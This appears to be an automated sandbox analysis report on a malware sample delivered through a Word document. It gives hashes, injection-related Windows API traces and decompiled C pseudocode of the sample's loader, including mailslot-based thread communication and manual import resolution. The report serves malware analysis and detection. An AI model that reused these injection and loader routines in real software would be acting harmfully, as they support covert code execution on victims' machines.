  • Opcode ID: 752983b3e7944d967bfc605664b24e9bd319d7a804b265e52fc9e08d56eeb1c9
  • Instruction ID: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
  • Opcode Fuzzy Hash: C60170421A6E65C8F471D947689AB3BF487FF967F6D09F70020C23028E4E8061D71F89
  • Instruction Fuzzy Hash: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
APIs
  • memset.NTDLL ref: 002E3750
  • memcpy.NTDLL ref: 002E3778
    • Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
    • Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
    • Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7
  • GetLastError.KERNEL32(00000010,00000218,002E4F6D,00000100,?,00000318,00000008), ref: 002E378F
    • Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
    • Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
    • Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
  • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,002E4F6D,00000100), ref: 002E3872
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

General

Root Process Name:Zx7i3Q9U9i.exe
Process MD5:1714CF2647A549D0D7529223ACF0FC97
Total matches:61
Initial Analysis Report:Open
Initial sample Analysis ID:56552
Initial sample SHA 256:C28329422090F74BA76A9BFDB7B0F1E578A5B83DB0CBED2D6BC365D968EF4652
Initial sample name:Healthy_Women_Inquiry.doc

Similar Executed Functions

Similarity
  • Total matches: 233
  • API ID: GetLastErrorNtSetContextThreadRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 405287775-0
  • Opcode ID: 16422fa5cbcf997cf8d8ddf4094cfe996cac4ccb4206dd4e90c3df64a56a7186
  • Instruction ID: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
  • Opcode Fuzzy Hash: FEF00C400F9BA0EBF812B6821491F547683BB02F32E0EF32051F200B863F02200E8B1A
  • Instruction Fuzzy Hash: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
APIs
  • memset.NTDLL ref: 002E38A2
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 002E3995
    • Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
    • Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
    • Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7
    • Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD
  • memcpy.NTDLL(00000218,002E4F92,00000100,?,00010003,?,?,00000318,00000008), ref: 002E391D
    • Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
    • Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
    • Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
  • NtSetContextThread.NTDLL(00000000,00010003,?,00000000,00000000,00000318,00000010,?,00010003,?,?,00000318,00000008), ref: 002E3974
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3977
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 297
  • API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 2756933261-0
  • Opcode ID: b4b338d5d8f61f66a6222dbf3d0f3f210939ec075dfbdcc0bd39eb5c8c15d6ad
  • Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
  • Opcode Fuzzy Hash: FCE0C04226CAC4E7E9F2F8451403B2B9140BF80142D5D7BA663A88D67F0F20B0031B1E
  • Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
APIs
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 002E27EA
  • memset.NTDLL ref: 002E280F
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E282B
  • NtClose.NTDLL(?), ref: 002E283F
    • Part of subcall function 002E2750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 002E277D
    • Part of subcall function 002E2750: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E2784
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 229
  • API ID: NtAllocateVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3367774474-0
  • Opcode ID: 41e13fcf86dc4b3d751067dcd296ed22fbfc5f147028583741b35f2a38466cce
  • Instruction ID: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
  • Opcode Fuzzy Hash: B0C012801C1D82EAD57B9488419DB2A119677A1101C1D733211809D5407FA0305B0F1D
  • Instruction Fuzzy Hash: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
APIs
  • NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
  • SetLastError.KERNEL32(00000000), ref: 002E3EA7
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 236
  • API ID: NtWriteVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 1449157707-0
  • Opcode ID: 2ed1afa1f8d583104eaac44049c4c607334b4aa5ab8e72b653f2dcbc79efa973
  • Instruction ID: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
  • Opcode Fuzzy Hash: 95C0928B1505C74DDB3AA98181EEF4DC2C57FB177342C31094088C972E598A326B4E49
  • Instruction Fuzzy Hash: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
APIs
  • NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
  • SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 238
  • API ID: NtReadVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3946382534-0
  • Opcode ID: aed4696055f3d46c6fa4a2efaa20ff5ea458cda21972fc3345feb9d6d727ddb0
  • Instruction ID: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
  • Opcode Fuzzy Hash: 09C092CB1415C74DDB3AA99281EAF4DC2C57EB177342C31094088C971E598A366B4E49
  • Instruction Fuzzy Hash: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
APIs
  • NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
  • SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 95
  • API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread
  • String ID:
  • API String ID: 2699342322-0
  • Opcode ID: cbe0259121293ce785fa7e3a9f1ca2c81b7074ba88f55b4f5292b4e6af892abb
  • Instruction ID: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
  • Opcode Fuzzy Hash: AFF089CB049AC2E5412D34407422FE79092DF92683D1CA6612EDE3664B1F51711BFA1E
  • Instruction Fuzzy Hash: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
C-Code - Quality: 100%
			E00401639(intOrPtr __eax, long _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				void _v28;
				void* __ebx;
				void* _t29;
				void* _t34;
				long _t45;
				void* _t47;
				void* _t51;

				 *0x40305c = __eax;
				_v28 = _a4;
				 *0x4030e8 = 0x736c6e70; // executed
				_t29 = CreateThread(0, 0, E00401034,  &_v28, 0,  &_v12); // executed
				_v8 = _t29;
				if(_t29 == 0) {
					_a4 = GetLastError();
				} else {
					_t34 = CreateThread(0, 0, E004010FB,  &_v28, 0,  &_v12); // executed
					_t47 = _t34;
					_v16 = _t47;
					if(_t47 == 0) {
						_a4 = GetLastError();
					} else {
						_a4 = 0;
						WaitForSingleObject(_t47, 0xffffffff); // executed
						if(GetExitCodeThread(_t47,  &_a4) == 0 || _a4 != 0) {
							TerminateThread(_v8, _a4);
						} else {
							WaitForSingleObject(_v8, 0xffffffff);
							if(GetExitCodeThread(_v8,  &_a4) != 0 && _a4 == 0) {
								_t45 = E00401593( &_v28, _t51); // executed
								_a4 = _t45;
							}
						}
						CloseHandle(_v16);
					}
					CloseHandle(_v8);
				}
				return _a4;
			}

APIs
  • CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
  • CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
  • GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
  • GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
    • Part of subcall function 00401593: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,757DC470,004016DC,?,?,00000000), ref: 004015B9
  • TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
  • CloseHandle.KERNEL32(?), ref: 004016F0
  • GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
  • CloseHandle.KERNEL32(?), ref: 00401704
  • GetLastError.KERNEL32(?,00000000), ref: 0040170D
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 95
  • API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset
  • String ID: \\.\mailslot\msl0
  • API String ID: 1001206095-622273203
  • Opcode ID: 003b2913688191ea114162166813de589c119e69325853280e698207d87bc8a2
  • Instruction ID: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
  • Opcode Fuzzy Hash: DFF02E85425EC28BC77E20443911BE16086B782F42C6CC3B29ED2342AB8F40710A9746
  • Instruction Fuzzy Hash: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
C-Code - Quality: 94%
			E004010FB(void* __ebx, void* __edi, void* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				void* _t28;
				void* _t34;
				int _t39;
				long _t40;
				long _t43;
				void* _t45;
				long _t46;
				void* _t48;
				void* _t52;

				_t48 = __edi;
				_t45 = __ebx;
				_v8 = 0;
				do {
					_t28 = CreateFileA("\\\\.\\mailslot\\msl0", 0x40000000, 3, 0, 3, 0, 0); // executed
					_v20 = _t28;
					if(_t28 != 0xffffffff) {
						_v12 = 0;
					} else {
						_v12 = GetLastError();
						Sleep(0x64);
					}
				} while (_v12 == 2);
				if(_v12 != 0) {
					L19:
					return _v12;
				}
				_t34 = E0040171F( *_a4,  &_a4,  &_v24); // executed
				if(_t34 == 0) {
					_v12 = 0xb;
					L18:
					CloseHandle(_v20);
					goto L19;
				}
				_t52 = _a4;
				_push(_t45);
				_t46 = _v24;
				_push(_t48);
				do {
					_v16 = _t46;
					if(_t46 >= 0x1000) {
						_v16 = 0x1000;
					}
					_t39 = WriteFile(_v20, _v8 + _t52, _v16,  &_v16, 0); // executed
					if(_t39 == 0) {
						_t40 = GetLastError();
						_v12 = _t40;
						if(_t40 != 0x79) {
							break;
						}
					} else {
						_t43 = _v16;
						_v8 = _v8 + _t43;
						_t46 = _t46 - _t43;
						if(_t46 == 0 && _t43 == 0x1000) {
							_t46 = _t46 + 1;
							_v8 = _v8 - 1;
						}
					}
					Sleep(0x64); // executed
				} while (_t46 != 0);
				memset(_t52, 0, _v8);
				E00401207(_t52);
				goto L18;
			}

APIs
  • CreateFileA.KERNEL32(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
  • GetLastError.KERNEL32 ref: 00401126
  • Sleep.KERNEL32(00000064), ref: 00401131
    • Part of subcall function 0040171F: memcpy.NTDLL(?,?,?,?,?,00000000), ref: 00401806
  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040118A
  • GetLastError.KERNEL32(?,?,00000002,?), ref: 004011A8
  • Sleep.KERNELBASE(00000064,?,?,00000002,?), ref: 004011B8
  • memset.NTDLL ref: 004011C8
    • Part of subcall function 00401207: HeapFree.KERNEL32(00000000,00401589,00401589), ref: 00401213
  • CloseHandle.KERNEL32(?), ref: 004011E4
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 182
  • API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen
  • String ID:
  • API String ID: 1756712956-0
  • Opcode ID: f2f8398e5a378612a0451dc2799ca230d083f10daad558b8caa29df948c1a906
  • Instruction ID: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
  • Opcode Fuzzy Hash: 73F027808E89B3CAC953D045D9CE7B64644BF90B5FC8C13A02480291551F6034EB3B5D
  • Instruction Fuzzy Hash: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
APIs
  • PathFindFileNameW.SHLWAPI(002E618C), ref: 002E1246
  • lstrcmpiW.KERNEL32(00000000,?,002E7494), ref: 002E124D
  • RegOpenKeyExA.KERNEL32(80000001,002E8080,00000000,00000000,?,?,002E7494), ref: 002E127E
  • lstrlenW.KERNEL32(?,002E7494), ref: 002E1292
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 002E12AA
  • RegQueryValueExW.KERNEL32(?,00000000,002E7494,00000000,002E7494,?,002E7494), ref: 002E12C9
  • StrStrIW.SHLWAPI(00000000), ref: 002E12E4
  • HeapFree.KERNEL32(00000000,00000000), ref: 002E12F9
  • RegCloseKey.ADVAPI32(?,?,002E7494), ref: 002E1302
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 143
  • API ID: lstrlenmemset$GetProcAddressLoadLibrary
  • String ID: ~
  • API String ID: 3655391705-1707062198
  • Opcode ID: 23239c877e3e9023a5525b3a16ecfaaed23ea4db6e96668c4a9e8c62ae4ebe7f
  • Instruction ID: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
  • Opcode Fuzzy Hash: EFF0590D195F71C6E16D6405187B7AA7082F39270BD14E9070193B31076880B3242F8C
  • Instruction Fuzzy Hash: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
C-Code - Quality: 100%
			E00401389(void* __edi, intOrPtr _a4) {
				_Unknown_base(*)()* _v4;
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				signed int _v16;
				intOrPtr _t23;
				struct HINSTANCE__* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				_Unknown_base(*)()* _t29;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr _t35;
				void* _t42;
				CHAR* _t44;
				intOrPtr* _t46;
				CHAR* _t49;
				signed int* _t50;
				intOrPtr _t57;

				_t42 = __edi;
				_t50 =  &_v16;
				_v16 = _v16 & 0x00000000;
				_t33 =  *((intOrPtr*)(_a4 + 0x80));
				if(_t33 == 0) {
					L23:
					return _v16;
				}
				_t34 = _t33 + __edi;
				_t23 =  *((intOrPtr*)(_t34 + 0xc));
				if(_t23 == 0) {
					goto L23;
				}
				while(1) {
					_t44 = _t23 + _t42;
					_t24 = LoadLibraryA(_t44); // executed
					_v12 = _t24;
					if(_t24 == 0) {
						break;
					}
					memset(_t44, 0, lstrlenA(_t44));
					_t27 =  *_t34;
					_t35 =  *((intOrPtr*)(_t34 + 0x10));
					_t50 =  &(_t50[3]);
					if(_t27 != 0) {
						L6:
						_t46 = _t27 + _t42;
						_t28 =  *_t46;
						if(_t28 == 0) {
							L19:
							_t23 =  *((intOrPtr*)(_t34 + 0x20));
							_t34 = _t34 + 0x14;
							if(_t23 != 0) {
								continue;
							}
							L22:
							goto L23;
						}
						_v8 = _t35 - _t46 + _t42;
						_t57 = _t28;
						L8:
						if(_t57 < 0) {
							if(_t28 < _t42 || _t28 >=  *((intOrPtr*)(_a4 + 0x50)) + _t42) {
								_t28 = 0;
							}
						} else {
							_t28 = _t28 + _t42;
						}
						_t11 = _t28 + 2; // 0x2
						_t49 = _t11;
						_t29 = GetProcAddress(_v12, _t49);
						_v4 = _t29;
						if(_t29 == 0) {
							goto L18;
						}
						if(_t49 >= 0) {
							memset(_t49, 0, lstrlenA(_t49));
							_t50 =  &(_t50[3]);
						}
						 *(_v8 + _t46) = _v4;
						_t46 = _t46 + 4;
						_t28 =  *_t46;
						if(_t28 != 0) {
							goto L8;
						} else {
							goto L19;
						}
						L18:
						_v16 = 0x7f;
						goto L19;
					}
					_t27 = _t35;
					if(_t35 == 0) {
						goto L19;
					}
					goto L6;
				}
				_v16 = 0x7e;
				goto L22;
			}


APIs
  • LoadLibraryA.KERNEL32(?), ref: 004013B6
  • lstrlenA.KERNEL32(?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 004013C9
  • memset.NTDLL ref: 004013D3
  • GetProcAddress.KERNEL32(?,00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 0040141E
  • lstrlenA.KERNEL32(00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 00401431
  • memset.NTDLL ref: 0040143B
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 204
  • API ID: GetTokenInformation$CloseHandleGetSidSubAuthorityGetSidSubAuthorityCountOpenProcessToken
  • String ID:
  • API String ID: 1755075983-0
  • Opcode ID: 12516916b99b4340f23e0e34973497135c3864d70b9c27df362c3fff36d6cf3a
  • Instruction ID: a037660959a659f5c3f904b5512dd759339b8539fa4e822d2db2cd3d0e1b79dd
  • Opcode Fuzzy Hash: 3EE02B810ECBC2DBA65F340445C0B6171E5FF20A05C8D1F605421AA1A65E3030677EAF
  • Instruction Fuzzy Hash: a037660959a659f5c3f904b5512dd759339b8539fa4e822d2db2cd3d0e1b79dd
APIs
  • OpenProcessToken.ADVAPI32(000000FF,00020008,002E7494,00000000), ref: 002E3F6C
  • GetTokenInformation.KERNELBASE(002E7494,00000014,00000001,00000004,?,00000000), ref: 002E3F8C
  • GetTokenInformation.KERNELBASE(002E7494,00000019,00000000,00000000,?), ref: 002E3F9C
  • CloseHandle.KERNEL32(002E7494), ref: 002E3FEC
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • GetTokenInformation.KERNELBASE(002E7494,00000019,00000000,?,?,?,002E618C), ref: 002E3FBF
  • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 002E3FC7
  • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 002E3FD7
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 199
  • API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx
  • String ID:
  • API String ID: 2400451634-0
  • Opcode ID: 20a1fe1949787535bd79f47ccd9ae32a5e8064993f8506e11f38a0a49419feba
  • Instruction ID: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
  • Opcode Fuzzy Hash: E2E02B881E4839C7857E180AD1DCF7102617FE1A5D9DC93511254561614F1DA0F77E8C
  • Instruction Fuzzy Hash: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
APIs
  • InterlockedIncrement.KERNEL32(002E7448), ref: 002E10B0
  • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 002E10C5
    • Part of subcall function 002E1000: memcpy.NTDLL(002E7570,?,0000000C,002E6248,0000000C,002E10E9,?,00000000,?), ref: 002E1038
  • CreateThread.KERNEL32(00000000,00000000,Function_0000005B,00000000,?,00000000), ref: 002E10F1
  • InterlockedDecrement.KERNEL32(002E7448), ref: 002E1109
  • SleepEx.KERNEL32(00000064,00000001), ref: 002E1125
  • CloseHandle.KERNEL32 ref: 002E1141
  • HeapDestroy.KERNEL32 ref: 002E114E
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 190
  • API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep
  • String ID: \\.\mailslot\msl0
  • API String ID: 2393858888-622273203
  • Opcode ID: a3ceb4dbf8eec70be79f35f386a0360ab8bfc7ba483ab19be25d62c214bd66f1
  • Instruction ID: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
  • Opcode Fuzzy Hash: 18E026820629C5C6567F100A28013B360CBBB7174BDDEE7600AA7391830F823017964A
  • Instruction Fuzzy Hash: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
C-Code - Quality: 96%
			E00401033(void* _a4) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _t24;
				long _t25;
				void* _t27;
				int _t32;
				long _t33;
				void* _t34;
				void* _t36;
				long _t39;

				_pop(_t41);
				_t39 = 0;
				_v8 = 0x1000;
				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0);
				_v16 = _t24;
				if(_t24 == 0) {
					_t25 = GetLastError();
					_t36 = _a4;
					_v8 = _t25;
				} else {
					_t36 = E004011F2(0x1000);
					if(_t36 == 0) {
						L10:
						_v8 = 8;
					} else {
						do {
							_t32 = ReadFile(_v20, _t36 + _t39, 0x1000,  &_v16, 0); // executed
							if(_t32 == 0) {
								_t33 = GetLastError();
								_v8 = _t33;
								if(_t33 == 0x79) {
									_v16 = 0x1000;
									goto L8;
								}
							} else {
								_v12 = _v12 + 0x1000;
								_t39 = _t39 + _v16;
								_t34 = HeapReAlloc( *0x40305c, 0, _t36, _v12); // executed
								_t36 = _t34;
								if(_t36 == 0) {
									goto L10;
								} else {
									_v8 = _v8 & 0x00000000;
									goto L8;
								}
							}
							goto L11;
							L8:
							Sleep(0x64); // executed
						} while (_v16 == 0x1000);
					}
					L11:
					CloseHandle(_v20);
				}
				if(_v8 == 0) {
					_t27 = _a4;
					 *(_t27 + 4) = _t36;
					 *((intOrPtr*)(_t27 + 8)) = _t39;
				}
				return _v8;
			}


APIs
  • CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
  • GetLastError.KERNEL32 ref: 004010D6
    • Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,00000000,00401543,00000208,00000000,?,004015FD,?,00000000,?,00000000,?,?,?,00000000), ref: 004011FE
  • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401076
  • HeapReAlloc.KERNEL32(00000000,00000000,?), ref: 00401092
  • GetLastError.KERNEL32 ref: 004010A4
  • Sleep.KERNELBASE(00000064), ref: 004010B7
  • CloseHandle.KERNEL32(?), ref: 004010CE
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 194
  • API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile
  • String ID:
  • API String ID: 1233022807-0
  • Opcode ID: 4e81c09fe99e8d89ea399b534ce1bd7a993d4de009fd61985864dbb219ec32a9
  • Instruction ID: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
  • Opcode Fuzzy Hash: A4D05E6E0C193ED1C1532416D8D6B2527027F6194EA4C1C322A8925217EFF471DFCB3D
  • Instruction Fuzzy Hash: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
APIs
  • CreateFileW.KERNEL32(002E74BC,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002E1689
  • CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E169F
  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E16B7
  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,002E7494), ref: 002E16C9
  • GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16D7
  • GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16E4
  • GetLastError.KERNEL32(?,002E7494), ref: 002E16F3
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 307
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 307323562-0
  • Opcode ID: c27f9509d813d6daf3205bb55a255c7f03bb055f708febb10643d95fc60cc1d5
  • Instruction ID: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
  • Opcode Fuzzy Hash: 6C017B4E066E93C6E9662240A651FB19381BF43A74E8E9B3642B1213DA5F54B00F970D
  • Instruction Fuzzy Hash: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
APIs
  • memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
    • Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
    • Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
    • Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
    • Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331
    • Part of subcall function 002E3DE6: NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
    • Part of subcall function 002E3DE6: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
    • Part of subcall function 002E3DE6: SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A
